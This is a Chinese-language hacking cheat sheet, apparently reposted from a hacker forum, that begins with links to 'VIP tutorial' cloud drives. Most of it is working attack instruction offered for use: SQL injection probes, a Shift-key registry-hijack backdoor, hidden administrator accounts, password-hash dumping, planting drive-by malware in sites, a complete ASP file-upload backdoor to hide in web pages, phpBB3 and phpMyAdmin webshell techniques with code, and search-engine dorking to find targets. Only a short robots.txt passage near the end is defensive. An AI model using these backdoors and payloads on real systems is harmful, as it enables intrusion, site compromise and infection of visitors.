黑基VIP教程网盘:
http://vipvipvip.qiannao.com
F4技术小组:
http://zhchyu.qiannao.com
新概念VIP教程网盘:
http://5872717.qiannao.com
VIP教程网盘:
http://qyqblog.ctdisk.com
1.php手工注入
and 1=1
and 1=2
order by
union select
2.抓包改包 shell
用到 wse抓包工具
明小子提交界面:h.t.t.p://127.0.0.1/upfile_photo.asp
3.快捷键后门
god后门 工具:NtGodMode.exe
命令:on 开启
off 关闭
用途:不用密码进入远程桌面
shift五次后门:sethc.exe
注册表劫持cmd
开始-运行-regedit,展命名字符串为:debugger
开到:
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\
4.隐藏账户 我的电脑与CMD查不到账户
工具:hideadmin.exe 格式:exp.exe\"账户 密码 /add”
5.2003 0day
工具:churrasco.exe 命令:exp.exe “账户 密码 /add”
6.抓取HASH值
用到工具 PwDump7.exe 直接cmd使用exp 格式:cmd.exe PwDump7.exe
HASH值 破解:ophcrack 软件 百度在线hash破解
7.网站挂马
框架代码:
用网马生成器生成url
js挂马:
用网马生成器生成url
首先将以下代码
document.write(\"\");
保存为1.js
如果1.js在网站根目录
则JS挂马代码在网站首页插入
8.lcx端口转发
服务器终端端口不为33 或在内网
前提:服务器要开33
webshell命令:lcx.exe “-slave 本机IP本机监听端口 127.0.0.133”
本机命令:lcx.exe \"-listen 本机监听端口 远程连接端口”
mstsc 服务器IP:远程连接端口
9.渗透方法
漏洞公布站点:
sebug.net
h.t.t.p: 雪刺.securiteam.c.o.m
h . t.t.p: 雪刺.securityfocus.c.o.m
溢出 overfilw
php本地包含漏洞 远程包含漏洞
1433服务器漏洞 135 telent漏洞
注入漏洞 暴库
后台编辑器:ewebeditor ewebeditornet fckeditor
robots.txt 网站路径机器人 防止引擎收录 路径利用
旁注查询 h % ttp: 雪刺.myipneighbors.c.o.m/
h % ttp: 雪刺.linkwan.com/gb/
h % ttp: 雪刺.114best.com/ip/
同网段嗅探 cain内网嗅探
C段
最后社工
本地软件漏洞利用0day: 暴风 QQword excel pdf
发rar制作jpg图片 捆绑木马 oday 灰鸽子
10.网页隐藏后门
方法一:一句话
方法二:在网页代码里面插入一段代码:
<%if request.QueryString(\"action\")=\"comeon\" then
a=Request.TotalBytes:if a Then b=\"adodb.stream\":Set
c=Createobject(b):c.Type=1:c.Open:c.Write
Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set
h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto
h,g-f-3:h.Position=0:h.type=2:h.CharSet=\"BIG5\":i=h.Readtext:h.close:j=mid(i,InstrRev(i,\"\\\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k
1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%>
<%end if%>
粘贴在网页文本最后面。。
利用:?action=comeon
在网页链接后面直接添加?action=comeon
传到根目录 木马名字不变。。。
11.phpbb3论坛拿到shell
进入后台控制面板=》服务器配置=》安全设定
(在模板中允许PHP)选项打开
然后进入模版编缉选个模板插三行代码
faq_body.html 就用这玩意。在尾部加入
eval($_POST[cmd]);
然后访问 /faq.php 用客户端链接
12.phpmyadmin那webshell
利用工具:一句话
原理:在phpmyadmin 创建一个表 把一句话写入创建的表 在把一句话导出 变成一个文件
在用一句话客户端连接一句话,上传webshell
phpmyadmin爆路径方法:
phpmyadmin/themes/darkblue_orange/layout.inc.php
/phpmyadmin/libraries/select_lang.lib.php
pphpmyadmin/libraries/export/xls.php
phpmyadmin\hemes\\darkblue_orange\\layout.inc.php
随便找个库SQL执行语句:
选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL); -----创建一个名字为a的表
Insert INTO a (cmd) VALUES(''); --------在a的表中密码为1的插入一句话
select cmd from a into outfile 'D:/PHPnow/htdocs/phpMyAdmin/11.php'; ----------把一句话导出 成为11.php的文件 前提必须知道根路径
Drop TABLE IF EXISTS a; -----------删除名字为a的 表
用客户端连接一句话
上传webshell
13.后台数据库备份修补
进入后台点击数据库备份 右键数据库备份名字 找到文件 改掉这个文件的名字后缀。。。。。是后台数据库备份功能失效 不建议删除本文件
14.数据库备份
上传jpg木马图片 得到路径 在数据库备份处 备份木马图片 改图片后缀
15.asp网站 手工注入
语句:
and 1=1
猜表名 and (select count(*) from 表名)>0 user admin system
猜列名 and (select count(列名) from 表名)>0 username password
猜长度 and (select top 1 len(username) from admin)>5 提示错误就说明长度是多少 说明管理员账户长度为5
猜长度 and (select top 1 len(password) from admin)>16 提示错误就说明长度是多少 说明管理员密码长度为16
猜内容 and (select top 1 asc(mid(password,ID,1)) from admin)>50 猜哪位密码 ID就写多少 在把50替换 错误的与正确 错误的时候去对照ASC码
asc码
asc码转换 用到工具:ASCII转换2.0版
不过此方法麻烦。。。。。
16.谷歌黑客。。。
intext:关键字。
把网页正文中某个关键字做为搜索条件,然后搜索全世界网页正文中含有这些关键字的网页,allintext:关键字。功能相同。比如搜索网页登陆口,intext:验证码 4800,
intitle:关键字。
把网页标题中某个关键字做为搜索条件,然后搜索全世界网页标题中含有这些关键字的网页,allintitle:关键字。功能相同。比如搜索网站后台,intitle:后台登陆
inurl:关键字。
搜索含有关键字的URL地址。这个语法非常的重要,使用的也是最为频繁,我们还可以使用allinurl来更加精确的定位URL地址。比如搜索含有movie的URL地址,输入“inurl:movie”即可,那么找出来的大部分是电影网站
site:域名。
返回域名中所有的URL地址,它可以探测网站的拓扑结构进行,也是非常的重要,使用非常频繁。比如搜索北京大学所有学院的URL地址,我们输入“学院 site:pku.edu.cn”就可以搜索到它所有的学院
查找特定程序系统
1.版权信息:动网的底部有Powered By Dvbbs
2.存在漏洞的文件名 inurl:wish.php discuz
结合社会工程,查找个人信息
防范:
Google Hack威力巨大,防范的方法之一是使用robots.txt来阻止Google等搜索引擎收录自己的网站敏感信息
搜索引擎通过一种程序robots(又称为spider)自动访问互联网上的网页并获取网页信息。可以在自己的网站中创建一个纯文本文件robots.txt,在这个文件中声明该网站不想被robots访问的部分,这样该网站的部分或全部内容就可以不被搜索引擎收录了,或者指定引擎只收录指定的内容
本文摘自: 黑盾科技论坛(http://www.hdhacker.com) 详细出处请参考:http://www.hdhacker.com/thread-1243-1-1.html
因篇幅问题不能全部显示,请点此查看更多更全内容
Copyright © 2019- oldu.cn 版权所有 浙ICP备2024123271号-1
违法及侵权请联系:TEL:199 1889 7713 E-MAIL:2724546146@qq.com
本站由北京市万商天勤律师事务所王兴未律师提供法律服务